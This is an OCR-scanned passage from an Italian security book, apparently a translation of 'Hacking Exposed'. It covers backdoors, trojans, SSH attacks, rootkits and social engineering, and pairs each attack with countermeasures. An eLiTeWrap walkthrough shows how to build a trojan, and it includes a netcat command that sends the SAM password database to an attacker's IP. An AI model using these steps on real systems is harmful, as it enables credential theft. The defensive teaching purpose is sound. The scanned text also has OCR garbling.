mente, in questo caso, l’utilizzo degli script è vivamente consigliato. Uno strumento 
più robusto per la rilevazione di intrusioni nel file system è sicuramente il veneran- 
do Tripwire, disponibile all'indirizzo http://ww.tripwire.com. 

Come compendio alla trattazione, non potevamo esimerci dal riservare una menzio- 
ne particolare ad alcune utility che riteniamo indispensabili per l'esame del conte- 
nuto dei file eseguibili. Esse comprendono strings, sia per Windows sia per UNIX, 
BinText per Windows di Foundstone, disponibile all'indirizzo http://ww. found - 
stone.com, e UltraEdit32 per Windows, all'indirizzo http://ww.ultraedit.com. 
Il punto di partenza più ovvio è cercare eventuali tracce di backdoor facilmente ri- 
conoscibili, come file eseguibili e librerie di supporto relativi. Normalmente questa 
ricerca dà esito negativo, perché la maggior parte degli strumenti visti può essere ri- 
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nominata, ma una buona metà del lavoro per la sicurezza di una rete consiste 
nell’eliminare le falle più evidenti. La Tabella 14.2 riporta un elenco dei principali 
file da controllare, 


Tabella 14.2 Nomi predefiniti degli eseguibili per il controllo remoto 


Backdoor Nomeii file Può essere 
rinominato? 
Utility remote di NT remote.exe Sì 
Netcat (UNIX e NT) ne e nc. exe Sì 
Rinetd rinetd e rinetd.exe Sì 
Incapsulamento di ICMP e UDP loki e lokid Sì 
Back Orifice [spazio].exe, boserve.exe, Sì 
boconfig.exe 
Back Orifice 2000 bo2k.exe, bo2kcfg.exe, Sì 


bo2kgui.exe, UMGR32.EXE, 
bo_peep.dll, bo3des.dll 


NetBus patch.exe, NBSvr.exe, KeyHook.dll Sì 

Virtual Network Computing WINVNC.EXE, VNCHooks.DLL e No 

per Windows (WINVNC) OMNITHREAD_RT.DLL 

Linux Rootkit (LRK) Ik Sì 

NT/200 Rootkit deply.exe e _root _sys No nel build 0,31a 


File di avvio e chiavi del Registro di sistema 


Una backdoor sarebbe piuttosto inutile, se bastasse un semplice riavvio della mac- 
china o l'intervento di un amministratore troppo pignolo a caccia di servizi non pre- 
visti a impedire all’intruso di ricollegarsi. Il modo più semplice per evitare questo ri- 
schio è inserire nei file di configurazione principali, o tra le voci del Registro, un ri- 
ferimento permanente agli strumenti di backdoor: infatti, spesso richiedono la pre- 
senza di alcuni particolari valori nel Registro di sistema per le operazioni di base e 
questo può servire per la loro identificazione ed eliminazione. 

Back Orifice inserisce un valore all’interno della chiave del Registro di sistema rela- 
tiva all'avvio di servizi, HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ 
Current Version\RunServices\: nell’installazione predefinita viene utilizzato il valore 
“Default” impostato a “.exe” ([spazio].exe), che è l'eseguibile standard del server 
BO, salvato nella directory C:\windows\system. BO2K crea una sua copia in un file 
di nome UMGR32.EXE, nella directory C:\windows\system di Windows 9x e 
C:\winnt\system32 di Windows NT/2000 (se in possesso delle autorizzazioni ne- 
cessarie). Ovviamente, l'hacker è libero di cambiare i valori a suo piacimento. Se 
all’interno della chiave del Registro di sistema chiamata in causa trovate un riferi- 
mento a un file di circa 124.928 byte, probabilmente si tratta di BO. BO2K occupa 
invece 114.088 byte. 

La versione più recente di NetBus crea diversi valori sotto HKFEY_LOCAZ_MACHI- 
NE\SOFTWARE\Net Solutions\NetBus Server, ma soprattutto inserisce in HKEY_ LO- 
CAI_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run un valore che 
punta all’eseguibile del server (nelle versioni precedenti il nome predefinito del va- 
lore era SysEdit, ma può essere modificato a piacimento). 

WINVNC crea una chiave di nome HKEY_USERS\.DEFAULT\Software\ORI\WinVNC3. 
In UNIX, è necessario cercare nei vari file di estensione .rc e in /etc/inetd.conf 
eventuali daemon sospetti. 
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Auditing, account e archiviazione dei file di log 


Ultima, ma non meno importante è la considerazione che non è possibile iden- 
tificare un’intrusione se gli allarmi non sono stati attivati. Assicuratevi di aver 
abilitato le funzionalità di auditing integrate dei vostri server. Per esempio, in 
Windows NT è possibile attivare le impostazioni dell’auditing delle attività da 
User Manager mentre in Windows 2000 è possibile utilizzare la applet Seczurity 
Policy, oppure lo strumento auditpol distribuito insieme al Resource Kit. Il file 
system di NT (NTFS) consente anche la registrazione degli accessi ai file, Per ef- 
fettuare questa operazione, fate clic con il tasto destro del mouse sulla cartella © 
il file desiderato in Explorer, selezionate Properties, la scheda Security, il pul- 
sante Auditing e create le voci appropriate. 


mente una diminuzione delle prestazioni, per cui molti evitavano di abili- 
tarlo. Tuttavia, le prove eseguite su Windows 2000 indicano che l'overbead 
associato all'auditing è stato notevolmente ridotto, quindi anche quando 
sono attivate tutte le impostazioni le prestazioni della macchina non subi- 
scono un rallentamento evidente. 


| i In Windows NT 4, un auditing eccessivamente prolifico provocava notoria- 


Ovviamente, anche il controllo più dettagliato è inutile, se i log non vengono periodi- 
camente esaminati, o se vengono eliminati o sovrascritti a causa della mancanza di 
spazio su disco o di una cattiva gestione. Una volta abbiamo visitato un sito Web che 
era stato messo in guardia contro un possibile attacco due mesi prima che l’azione 
avesse luogo, e se non fosse stato per una scrupolosa gestione dei log da parte degli 
amministratori di sistema l'intrusione non sarebbe mai stata rilevata. Si consiglia di 
adottare una politica di archiviazione periodica dei log per evitare di perdere prove 
importanti (molte aziende importano periodicamente i file di log all’interno di databa- 
se per semplificare la ricerca e i meccanismi di allarme automatico), 

Siate sempre molto attenti a variazioni di account sospette: utilizzate strumenti di terze 
parti per salvare periodicamente un'immagine dello stato del sistema, che vi servirà 
per svolgere queste attività. Per esempio, strumenti come DumpSec di Somarsoft 
(DumpACL), DumpReg e DumpFvt (http://ww.somarsoft.com) sono in grado di 
catturare tutte le informazioni importanti relative a un sistema Windows NT/2000 uti- 
lizzando una semplice sintassi da riga di comando. 


Trojan 

Diffusione: 10 
Semplicità: 8 
Impatto: 10 
Fattore di rischio: 9.5 


Come già accennato nell’introduzione a questo capitolo, un trojan è un pro- 
gramma che si presenta come uno strumento software di una qualche utilità, ma 
che in realtà, una volta lanciato, installa di nascosto un software dannoso. Molte 
backdoor per il controllo remoto (illustrate in precedenza) possono essere ma- 
scherate da pacchetti dall’apparenza innocua, in modo che l'utente sprovveduto 
non si renda neanche conto di installarle. Come esempio aggiuntivo, si conside- 
ri un eseguibile che si fa passare per netstat, e che intenzionalmente non vi- 
sualizza alcune porte di ascolto per mascherare la presenza di una backdoor: 
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nel prosieguo del capitolo vedremo alcuni esempi di questo tipo di trojan come 
FPWNCLNT.DLL e i rootkit. 


® Whack-A-Mole 


Un esempio di veicolo di propagazione piuttosto comune per NetBus è un gioco di 
nome Whack-A-Mole, che si presenta come un unico eseguibile di nome whacka- 
mole.exe, ma che in realtà è un file WinZip autoestraente. Whack-A-Mole installa il 
server NetBus con il nome “explore.exe” e crea un riferimento all’eseguibile in 
HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run, che lancia NetBus a 
ogni avvio della macchina (il nome del valore è “explore”); il tutto accade pratica- 
mente senza che l'utente se ne renda conto, ed è seguito dall'apertura di un simpa- 
tico giochino di nome Whack-A-Mole, che è anche piuttosto divertente (ops! Forse 
non dovevamo dirlo!). L'aspetto di Whack-A-Mole è mostrato nella figura seguente. 


Whack-A-Mole 


Game Pause About 


® eLiTeWrap 


Un programma molto diffuso per la creazione di trojan è eLiTeWrap, disponibile 
all'indirizzo http://ww.holodeck.f9.co.uk/elitewrap/index.html: riunisce in 
un unico eseguibile diversi file, che vengono quindi estratti o eseguiti sul sistema re- 
moto. Come si vede nel seguente esempio, è possibile includere anche file batch 0 
script, il che permette agli hacker di sferrare attacchi 44 hoc per ogni sistema: 


C:\nt\ew> elitewrap 

eLiTeWrap 1.03 - (C) Tom "eLiTe" McIntyre 
tom@dundeecake.demon.co.uk 
http://www.dundeecake.demon.co.uk/elitewrap 
Stub size: 7712 bytes 

Enter name of output file: bad.exe 
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Operations: 1 - Pack only 

2 - Pack and execute, visible, asynchronously 
3 - Pack and execute, hidden, asynchronously 
4 - Pack and execute, visible, synchronously 
5 - Pack and execute, hidden, synchronously 
6 - Execute only, visible, asynchronously 
7 - Execute only, hidden, asynchronously 
8 - Execute only, visible, synchronously 
- Execute only, hidden, synehronously 
Enter package file #1: c:\nt\pwdump.exe 

Enter operation: 1 

Enter package file #2: c:\nt\nc.exe 

Enter operation: 1 

Enter package file #3: c:\nt\ew\attack.bat 

Enter operation: 7 

Enter command line: 

Enter package file #4: 

All done :) 


te) 


Il risultato dovrebbe essere un file di nome “bad.exe”, che una volta lanciato estrae 
i file pwdump.exe, netcat (nc. exe) ed esegue il file batch attack.bat, che esegue un 
semplice comando come pwdump | nc.exe -n 192.168.1.1 3000, che scarica il da- 
tabase SAM di NT sul sistema dell’hacker (192.168.1.1, che sarebbe configurato per 
ascoltare sulla porta 3000 servendosi di netcat). 

ELiTeWrap può essere intercettato se il pirata dimentica di eliminare la firma eLi- 
TeWrap dall’eseguibile, Il seguente comando find permette di trovare tale firma in 
qualsiasi file .EXE: 


C:\nt\ew> find "eLiTeWrap" bad.exe 
ue ----.- BAD. EXE 
eLiTeWrap V1.03 


considerata l’unico metodo per intercettare i trojan realizzati con eLi- 


M La definizione “eLiTeWrap” può essere modificata, e non può quindi essere 
TeWrap. 


FPNWCLNT.DLL per Windows NT 


Un’attività particolarmente insidiosa solitamente svolta dai trojan è catturare nomi 
utente e password (facendosi passare per componenti legittimi) per effettuare la 
connessione al sistema. Un ottimo esempio è la libreria FPNWCLNT.DLL, che viene 
installata sui server NT per cui sia necessario sincronizzare le password con sistemi 
Novell NetWare. Questa DLL intercetta le modifiche alle password prima che ven- 
gano cifrate e riportate nel SAM, permettendo ai servizi NetWare di ottenerle in for- 
ma leggibile ed effettuare un solo login. 

È stato messo a disposizione su Internet un codice sorgente di prova, in grado di re- 
gistrare le notifiche di modifiche alle password nel file C:\TEMP\PWDCHAN- 
GE.OUT, ma non le password effettive. Ovviamente, il codice per catturare le pass- 
word in chiaro è facilmente personalizzabile. 
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Contromisure al trojan FPNWCLNT 


Se non avete bisogno di sincronizzare le password tra ambienti NT e NetWare, eli- 
minate il file FPNWCLNT.DLL, nella cartella %systemrootW\system32. Inoltre, verifi- 
cate la voce del Registro di sistema 7HKEY_LOCAL_MACHINE\SYSTEM\CurrentCon- 
trolSet\ControI\Lsa\Notification Packages (REG_ MULTI_SZ), eliminando la stringa 
FPNWCLNT. Se invece la DLL è necessaria per il funzionamento di un ambiente mi- 
sto, assicuratevi che sia in esecuzione la versione originale di Microsoft confrontan- 
do il file con una copia sicuramente corretta (per esempio, quella sul disco di instal- 
lazione di NT). In caso di dubbio ripristinate l'originale. 


Crittografia 


La crittografia, che traducendo letteralmente dal greco antico significa “scrittura na- 
scosta” ovvero segreta, è la scienza (qualcuno potrebbe anche dire l’arte) di proteg- 
gere e salvaguardare l'integrità e la segretezza dei dati personali. La sua origine può 
essere fatta risalire al cifrario a sostituzione semplicemente monoalfabetica di Giulio 
Cesare, che si è poi sviluppato in cifrari a sostituzione polialfabetica, il One-Time 
Pad, i cifrari block e i criptosistemi a chiave pubblica. La crittografia ha indubbia- 
mente rivoluzionato il modo di serbare i propri segreti. 

Dal momento che la crittografia è ormai una parte integrale dei moderni sistemi di 
sicurezza, la forzatura del messaggio cifrato è di conseguenza una delle metodolo- 
gie chiave impiegate dagli intrusi. Questo paragrafo presenterà una panoramica sul- 
le tecniche di attacco ai sistemi crittografici impiegate dagli hacker, generalmente 
definite crittoanalisi. 


Terminologia 


Prima di gettarsi a capofitto nella crittoanalisi è utile definire alcuni termini. Si utiliz- 
za testo in chiaro (plaintext) per identificare i dati prima che venga applicato un si- 
stema crittografico e testo cifrato (ciphertext) per identificare i dati dopo che un si- 
stema crittografico è stato applicato al plaintext. I termini codifica (ercryption) e de- 
codifica (decryption) di dati sono utilizzati per descrivere rispettivamente il proces- 
so di trasformazione del plaintext in ciphertext e del ciphertext in plaintext. 


Classi di attacco 


Gli attacchi di crittoanalisi possono essere raggruppati in due classi: passiva e attiva. 
Gli attacchi della classe passiva sono composti da tecniche come il controllo e l’ana- 
lisi del traffico, che non richiedono una manipolazione manifesta del ciphertext, del 
plaintext o di altri elementi o processi del sistema crittografico: sono di solito desti- 
nate alla violazione di dati confidenziali. Gli attacchi della classe attiva riguardano la 
falsificazione di messaggi o altri metodi per cercare di violare non solo la riservatez- 
za ma anche l’integrità e l'autenticità dei dati. Ci sono poi le singole denominazioni 
degli attacchi, tra cui ciphertext-only, known-plaintext, chosen-plaintext e chosen- 
cipbertext, determinate in base alle informazioni che si possono ottenere sul sistema 
crittografico che sta per essere attaccato, e su come l'avversario possa manipolare le 
informazioni per compromettere la sicurezza del sistema o dell'applicazione. Allo 
scopo di illustrare l’impostazione mentale e il processo di crittoanalisi, forniremo 
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molti esempi di come questi tipi di attacchi sono stati implementati in sistemi critto- 
grafici pubblicamente visibili. 


Attacchi a SSH (Secure SHell) 


SSH è un protocollo sicuro per proteggere la comunicazione interattiva di un termi- 
nale remoto o il trasferimento di file su Internet, che per la codifica dei dati utilizza 
sistemi crittografici sia simmetrici sia asimmetrici. SSH può essere vulnerabile a un 
attacco passivo e MITM (Man-In-Thbe-Middle, che verrà trattato successivamente), 
partendo dall’analisi del traffico. Questi attacchi possono rivelare informazioni sulla 
lunghezza della password e sui comandi digitati dall’utente, o peggio ancora posso- 
no anche compromettere il sistema. 


O Analisi del traffico 


Diffusione: 5 
Semplicità: 4 
Impatto: 6 
Fattore di rischio: 5 


Dawn Xiaodong Song, David Wagner e Xuquing Tian di Berkeley, University of Ca- 
lifornia, hanno realizzato una pubblicazione chiamata 7iming Analysis of Keystrokes 
and Timing Attacks on SSH (http://paris.cs.berkeley.edu/-dawnsong/ssh- 
timing.html), che descrive vari attacchi di analisi del traffico su protocolli $SH. So- 
lar Designer e Dug Song hanno scritto sshow (http://ww.openwall.com/adviso- 
ries/0W-003-ssh-traffic-analysis.txt), uno strumento che può mostrarvi la 
lunghezza della password e i comandi che avete digitato su Internet identificando il 
traffico protetto da SSH. Le informazioni ottenute possono portare a un più rapido 
attacco al lessico o semplicemente alla fuoriuscita di informazioni. 


° Contromisure all’analisi del traffico 


Alcune patch (cioè rettifiche di programma che consistono nell'aggiunta o correzio- 
ne di una piccola parte del programma stesso) sono messe a disposizione per diver- 
si server e client SSH. La compressione di dati in SSH non è di molto aiuto nel pre- 
venire questo tipo di attacchi poiché la compressione è di solito prevedibile e di- 
pende dalla lunghezza dei dati originari. Diversi byte di riempimento di tipo null se 
implementati correttamente nei dati potrebbero prevenire questi attacchi di analisi 
del traffico. 


® Attacco MITM (Man-In-The-Middle) 


Diffusione: 7 
Semplicità: 6 
Impatto: le] 
Fattore di rischio: 7 


Dug Song ha scritto una serie di programmi chiamati dsniff (http://www. 
monkey.org/-dugsong/dsniff/) che comprende uno strumento chiamato sshmitm, 
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il quale implementa l'attacco di Dug chiamato “Man-In-The-Middle” nel traffico Web 
SSH-protetto. Sostanzialmente il programma si pone tra il client e il server, intercetta 
la richiesta del client e replica con una risposta falsa del server. Nel frattempo il pro- 
gramma invia la stessa richiesta al server, fingendo di essere il client, e passa le infor- 
mazioni dal server al client. Questo attacco può compromettere il traffico protetto da 
SSH. Questo strumento deve essere utilizzato con un altro chiamato dnspoof che ge- 
nera false risposte DNS. Un altro programma, webmitm, applica un attacco simile 
contro il traffico SSL-protetto di WWW, 


Di Contromisure all’attacco Man-In-The-Middle 


Controllare le chiavi pubbliche utilizzate da ogni host SSH è la contromisura più 
semplice da adottare per impedire di essere attaccati da sshmitm. L'attacco da web- 
mitm può essere ostacolato grazie all’autenticazione di certificato client. 


9 Recupero della chiave 
Diffusione: 5 
Semplicità: 5I 
Impatto: 5 
Fattore di rischio: 5 


Ariel Wassbein e Augustin Azubel da CORF-SDI hanno sviluppato questo attacco 
per il recupero chiave contro SSH basato sull'attacco di David Bleichenbacher contro 
una specifica implementazione di un sistema criptato a chiave pubblica (dissertazio- 
ne sul CORE che potete trovare all'indirizzo http://www.corest.com/pressroom/ 
advisories_desplegado.php?idxsection=10&idx=82). Questo attacco può evi- 
denziare la chiave utilizzata per una sessione SSH, che può essere utilizzata in un se- 
condo tempo per decodificare il traffico protetto e compromettere il sistema. 


Contromisure al recupero della chiave 


Questa vulnerabilità compare solo nella versione 1 del protocollo SSH. Il problema 
può essere risolto in due modi: aggiornandosi all'ultima implementazione messa a 
disposizione dal fomitore, o utilizzando la versione 2 del protocollo SSH. 


Modifica dell’ambiente di sistema: 
rootkit e strumenti di imaging 


Finora abbiamo parlato diffusamente dei numerosi metodi che possono essere uti- 
lizzati per inserire trappole in un sistema in modo che gli utenti legittimi non abbia- 
no alcun sospetto di quanto sta effettivamente accadendo. Tuttavia, la maggior par- 
te dei concetti presentati finora riguardano strumenti che vengono eseguiti come 
normali programmi (a parte il loro fine dannoso) e che possono essere facilmente 
smascherati. Sfortunatamente, gli aggressori possono essere molto più cattivi. Con 
la sempre maggiore diffusione di conoscenze specifiche sull’architettura dei sistemi 
operativi, la violazione completa di un sistema sta diventando quasi banale. 
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® Rootkit 


Cosa accadrebbe se il codice stesso del sistema operativo finisse sotto il controllo di 
un hacker? Questa idea è maturata sulle piattaforme UNIX, in cui la compilazione 
del codice di sistema è talvolta un evento settimanale, per quelli più sul filo del ra- 
soio. Come ovvia conseguenza, le suite software che hanno sostituito i trojan al po- 
sto dei file eseguibili, nei sistemi operativi più diffusi a base binaria, hanno preso il 
nome di rootkit, perché richiedono in genere la manomissione dell’utente root della 
macchina UNIX obiettivo. I rootkit di UNIX sono descritti nel Capitolo 7 e general- 
mente possono essere suddivisi in quattro gruppi di strumenti, appositamente com- 
pilati per quel tipo e per quella versione UNIX: 1) cavalli di Troia, per esempio ver- 
sioni alterate di login, netstat e ps; 2) backdoor come inetd; 3) sniffer che si con- 
nettono a diversi dispositivi; 4) strumenti per la “pulizia” del log di sistema. 

Per avere un'idea della quantità di rootkit UNIX attualmente disponibili, visitate 
l'indirizzo http://packetstormsecurity.org/UNIX/penetration/rootkits/ (al- 
tri sono disponibili nella directory /UNIX/misc dello stesso sito). Il rootkit Linux 
versione 5 (LRK5) è probabilmente uno dei più conosciuti, e tra le altre cose vanta 
versioni backdoor di alcune utility di shell critiche, tra cui su, una versione trojan di 
ssh e diversi sniffer. 

Per non essere da meno, Windows NT/2000 ha avuto il suo rootkit nel 1999, per gen- 
tile concessione del gruppo di Greg Hoglund (http://ww.rootkit.com), Greg ha 
tenuto la comunità Windows sulle spine dimostrando il funzionamento di un rootkit 
per Windows che consente di nascondere le chiavi del Registro di sistema ed esegui- 
re il reindirizzamento degli eseguibili; questo rootkit può inoltre essere utilizzato per 
creare versioni trojan dei file eseguibili senza alterare il loro contenuto. Tutti i trucchi 
adottati da un rootkit sono basati sulla tecnica denominata “aggancio della funzione” 
(in inglese “Function hooking”): modificando il kernel NT in modo da poter usurpare 
le chiamate di sistema, il rootkit è in grado di nascondere un processo, una chiave del 
Registro di sistema o un file, oppure può reindirizzare le chiamate a funzioni trojan. Il 
risultato è ancora più insidioso di un rootkit in stile trojan, in quanto l'utente non può 
mai essere sicuro dell’integrità del codice che viene eseguito. 


Contromisure al rootkit 


Quando non potete più fidarvi neanche del comando ls o dir, è ora di gettare la 
spugna: eseguite la copia di riserva dei dati critici (non dei file eseguibili!), cancel- 
late tutto e reinstallate il software da supporti affidabili. Non confidate sulle copie 
di riserva in vostro possesso: è impossibile sapere quando il pirata ha acquisito il 
controllo del sistema, pertanto rischiereste di ripristinare software già attaccato da 
un trojan. 

A questo punto è importante sottolineare una delle regole d’oro sulla sicurezza e 
sul ripristino della situazione iniziale dopo una calamità: condizioni note e ripeti- 
bilità. I sistemi di produzione spesso richiedono un ripristino veloce, pertanto è 
indispensabile disporre di una procedura di installazione ben documentata e il 
più possibile automatizzata. Anche l'immediata disponibilità di supporti di ripristi- 
no affidabili è particolarmente importante. Masterizzare un CD-ROM contenente 
l'immagine di un server Web completamente configurato permette di risparmiare 
una notevole quantità di tempo. Poiché durante il processo di costruzione di un 
sistema o nella sua fase di manutenzione è necessario scendere a compromessi 
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sulla sicurezza (abilitazione di condivisione di file e così via), è necessario confi- 
gurare la modalità di produzione in confronto a quella di rappresentazione. Ac- 
certatevi di disporre di un elenco numerato o di uno script automatizzato per tor- 
nare alla modalità di produzione. 

Eseguire il checksum del codice è un altro valido mezzo di difesa contro tecniche 
di attacco come i rootkit, ma è necessario partire da uno stato originale, non dan- 
neggiato. Strumenti come il programma gratuito MD5sum o Tripwire (illustrato in 
precedenza) possono ricostruire il profilo dei file, permettendo di rilevare even- 
tuali violazioni di integrità quando si verificano modifiche. In teoria, il reindirizza- 
mento degli eseguibili operato da rootkit per NT/2000 dovrebbe essere in grado 
di aggirare le contromisure basate su checksum, in quanto il codice in questione 
non è alterato, ma agganciato e pilotato da un altro eseguibile. 

Poiché lo scopo principale della versione del rootkit per NT/2000 è quello di dimo- 
strare le funzionalità chiave, piuttosto che tutti gli stratagemmi disponibili, è abba- 
stanza facile identificarlo. Andate alla ricerca di deploy.exe e _root_.sys. È possi- 
bile avviare e interrompere il rootkit utilizzando il comando net seguente: 


net start _root_ 
net stop root. 


Inoltre, non è nostra intenzione sorvolare su uno dei componenti del rootkit più dan- 
nosi, installato in genere su un sistema manomesso: gli sniffer. Questi strumenti di 
ascolto del traffico di rete sono particolarmente insidiosi, in quanto sono in grado di 
manomettere altri sistemi che si trovano sul segmento di rete locale, registrando le 
password che transitano sul cavo durante le normali operazioni di autenticazione. 
Come se non l’avessimo già ripetuto abbastanza, ogniqualvolta è possibile vi consi- 
gliamo di utilizzare gli strumenti di cifratura delle comunicazioni, come per esem- 
pio Secure Shell (SSH), Secure Sockets Layer (SSL), Pretty Good Privacy (PGP) o 
strumenti di cifratura dello strato IP, come quello fornito dai prodotti VPN (Virtual 
Private Network) basati su IPSec (si veda il Capitolo 9). Questo è l’unico metodo 
quasi infallibile per evitare gli attacchi per intercettazione del traffico di rete; anche 
l'adozione di tipologie di rete commutate può contribuire a ridurre il margine di ri- 
schio, ma la protezione totale non può essere garantita quando in giro ci sono stru- 
menti come dsniff (Capitolo 7). 


CL) Strumenti di imaging per aggirare i checksum 


Ci sono diversi strumenti che possono essere utilizzati per creare immagini specula- 
ri dei volumi di sistema (Tabella 14.3): si tratta di strumenti molto potenti, che con- 
sentono un certo risparmio di tempo e la cui utilità è inestimabile quando si verifica 
una situazione critica, ma la cui precisione nel catturare lo stato del sistema può es- 
sere utilizzata per ingannare i meccanismi di sicurezza basati sul checksum dei dati 
di sistema. 

Ovviamente, questi tipi di attacchi richiedono tutti l’accesso completo al sistema, 
perché tutte le procedure elencate nella Tabella 14.3 richiedono almeno il riavvio 
del sistema o la rimozione fisica dei dischi rigidi. Anche se un aggressore ottiene 
un accesso di questo tipo al sistema, l'attacco è in ogni caso piuttosto difficile da 
portare a termine (tornate indietro e rileggete il paragrafo sui rootkit se avete dub- 
bi). Ipotizziamo, tuttavia, un'applicazione che faccia affidamento sulle informa- 
zioni di sistema, come per esempio elementi nell'elenco dei processi, utilizzo del- 
la CPU e così via, per creare checksum sui dati utilizzati in seguito per autorizzare 
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un qualche tipo di transazione. Se in un dato istante viene creata un'immagine 
dello stato del sistema, è possibile alterare il checksum e ripristinare una copia 
perfetta del sistema senza che nessuno se ne accorga. L'applicazione non sarebbe 
a conoscenza dell'avvenuta transazione e gli utenti potrebbero liberamente utiliz- 
zare l'applicazione per eseguire il processo di creazione dell'immagine tutte le 
volte che lo desiderano. 


Tabella 14.3 = Tecnologie perla copia dello stato del sistema e relativi prodotti 


Tecnologia Prodotto URL 
Dispositivi hardware Image MASSter http://ww.ics-iq.com 
per la duplicazione 
dei dischi 
OmniClone line http://www.logicube.com 
Strumenti software di Drive Image http://www.powerquest.com 
clonazione dei dischi 
FlashClone http://ww.ics-igq.com 
ImageCast http://www. innovativesoftware.com 
Norton Ghost http://ww.symantec.com 
RapiDeploy http://www.altiris.com 
Dischi virtuali protet-.. VMWare http://www.vmware.com 
ti da scrittura 
Strumenti di ripristi-  SecondChance http://www.powerquest.com 
no del sistema (solo Windows 9x) 


Contromisure all’imaging del sistema 


La sicurezza fisica dei sistemi dovrebbe essere sempre al primo posto nell'elenco 
delle priorità relative alla sicurezza. Le porte bloccate in modo corretto eliminano 
probabilmente la possibilità di attacchi per clonazione o imaging. 

Nell'esempio di attacco per rifiuto visto in precedenza le cose si complicano legger- 
mente: le tecniche di non rifiuto integrate nelle applicazioni devono essere proget- 
tate in modo da non fare affidamento su componenti software dello stato di sistema 
come elementi nell’elenco dei processi, footprint del file system o altri elementi che 
possono essere facilmente ricreati utilizzando strumenti di imaging. Se il produttore 
di un'applicazione non è disponibile a fornire dettagli tecnici sull'implementazione 
del non rifiuto, vi consigliamo di cercare alternative. 


Ingegneria sociale 


Diffusione: 10 
Semplicità: 10 
Impatto: 10 
Fattore di rischio: 10 


L'argomento finale che affronteremo in questo capitolo, dedicato alle tecniche di 
hacking avanzate, è quello che suscita il maggior timore tra coloro che si trovano 
sul lato protetto di un firewall: l'ingegneria sociale. Anche se riteniamo si tratti di 
uno dei termini più infelici del gergo degli hacker, la definizione “ingegneria socia- 


mati, semplicemente spacciandoci per il gruppo di supporto tecnico interno. Fare 
pesare la propria autorità, come direttore dell'IT o come parte del supporto tecnico, 
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è sempre molto efficace. 


Contromisure agli attacchi 


Abbiamo presentato numerosi tipi di attacco, alcuni dei quali apparentemente in- 
contenibili e difficili da contrastare (come per esempio le ricerche libere su Inter- 
net). Anche se pensiamo che anticipare ogni possibile attacco per ingegneria socia- 
le sia praticamente impossibile, faremo del nostro meglio per evidenziare alcuni 


basati sull’ingegneria sociale 


metodi di difesa che abbiamo trovato efficaci. 


Limitate la fuoriuscita dei dati. Siti Web, database pubblici, pagine gialle 
e così via, dovrebbero tutti contenere informazioni generiche, come per 
esempio i numeri di telefono principali dell'azienda e descrizioni di funzio- 
ni generiche, anziché nomi di dipendenti (per esempio, “Responsabile di 
zona” invece di “Mario Rossi”). 

Stabilite una politica rigorosa per le procedure di supporto tecnico 
interne ed esterne. A tutti gli interlocutori devono essere richiesti ulteriori 
dati di identificazione, come il numero di matricola, prima di ricevere sup- 
porto. Inoltre, i gruppi di supporto devono fornire assistenza solo per attivi- 
tà ben definite e non devono rispondere a domande generiche sulle tecno- 
logie adottate all'interno dell'azienda. Definite procedure particolareggiate 
di acquisizione delle informazioni, per quelle eccezioni che sicuramente si 
presenteranno. 

Siate cauti al limite della paranoia, per quanto riguarda gli accessi re- 
moti. Ricordate che i privilegi di accesso remoto sono un grande vantaggio 
per la produttività, ma anche per i potenziali hacker. Per suggerimenti sulla 
sicurezza delle connessioni di accesso remoto si veda il Capitolo 8. 
Prestate nella creazione dei controlli firewall in uscita e di accesso al 
router la stessa attenzione dedicata a quelli in entrata. Questo scorag- 
gerà i tentativi di ingannare gli utenti mappando all’esterno le informazioni 
sulla condivisione dei file. L'abitudine di eseguire una pulizia costante ac- 
quista un'importanza fondamentale (l’ultima regola su ogni elenco di con- 
trollo di accesso dovrebbe specificare di negare tutto a tutti). 


Utilizzate la posta elettronica in modo sicuro. Imparate a risalire al per- 
corso di un messaggio utilizzando gli header (potete trovare una indicazio- 
ne su come configurare molti client di posta elettronica per visualizzare gli 
header dei messaggi all'indirizzo Web http://spamcop.net). Per ulteriori 
informazioni, si veda il Capitolo 16. 


Istruite i dipendenti fornendo loro le nozioni base sulla sicurezza dei 
sistemi informatici. Stabilite un programma per la sicurezza, pubblicizzate- 
lo all’interno dell’organizzazione e addestrate i vostri impiegati a rispondere 
alle domande dei colleghi e a non dare nulla per scontato. La RFC 2196, The 
Site Security Handbook, è un ottimo punto di partenza per sviluppare una 
politica di sicurezza. Tutti gli utenti Internet dovrebbero leggere anche la RFC 
2504, che accompagna la RFC 2196. Entrambe sono disponibili all'indirizzo 
Web http://ww.rfc-editor.org. 


Capitolo 15 


Hacking del Web 


Malgrado un breve rallentamento nella prima parte del nuovo millennio, il World 
Wide Web continua ad espandersi a un ritmo di gran lunga superiore alle aspettati- 
ve della maggior parte dei suoi utenti abituali. I sistemi legacy (tradizionali) vengo- 
no soppiantati da applicazioni dinamiche, compatibili con i browser Web, ospitate 
da server Web che attingono al pozzo senza fondo dei database backend. La conti- 
nua diffusione dell'accesso a Internet a banda larga ha reso più ricca l’esperienza 
del navigatore favorendo l'aggiunta di nuove potenti funzionalità multimediali. 
Inoltre i notevoli progressi messi a segno dalle tecnologie wireless hanno conferito 
alle applicazioni Web un nuovo aspetto: possono essere eseguite ovunque e in 
qualsiasi momento. 

Tuttavia, al lancio di ogni nuova applicazione Web e di ogni sito di e-business che 
utilizza una pila di server, vi sono hacker malintenzionati in agguato. In effetti, 
l'enorme diffusione del Web lo ha reso il bersaglio principale delle attenzioni dei 
malintenzionati di tutto il mondo. Con la rapida espansione del Web e con firewall 
relativamente impotenti a bloccare ingegnosi aggressori che dirottano il traffico le- 
gittimo sulla “porta 80”, le cose possono solo peggiorare. In questo capitolo cerche- 
remo di definire la portata del fenomeno dell’hacking del Web e di mostrarvi come 
potete evitare di diventare un altro “caso” citato nelle statistiche dei siti attaccati ne- 
gli ultimi anni. Il nostro approccio difensivo si articola su due direttrici, corrispon- 
denti alle due parti che compongono questo capitolo: l'hacking dei server Web e 
quello delle applicazioni Web. 


Hacking dei server Web 


Il termine “hacking dei server Web” indica lo sfruttamento da parte di un aggressore 
dei punti vulnerabili insiti nel software del server Web (o di uno dei suoi compo- 
nenti aggiuntivi). Questi tipi di vulnerabilità sono di solito ampiamente pubblicizza- 
ti e facilmente rilevabili e attaccabili. Un aggressore che disponga di un corredo op- 
portuno di tool e di attacchi pronti all’uso può mettere in crisi un server Web vulne- 
rabile in pochi minuti. Alcuni dei worm Internet dagli effetti più devastanti scoperti 
finora hanno sfruttato vulnerabilità di questo tipo (per esempio, i due worm più in- 
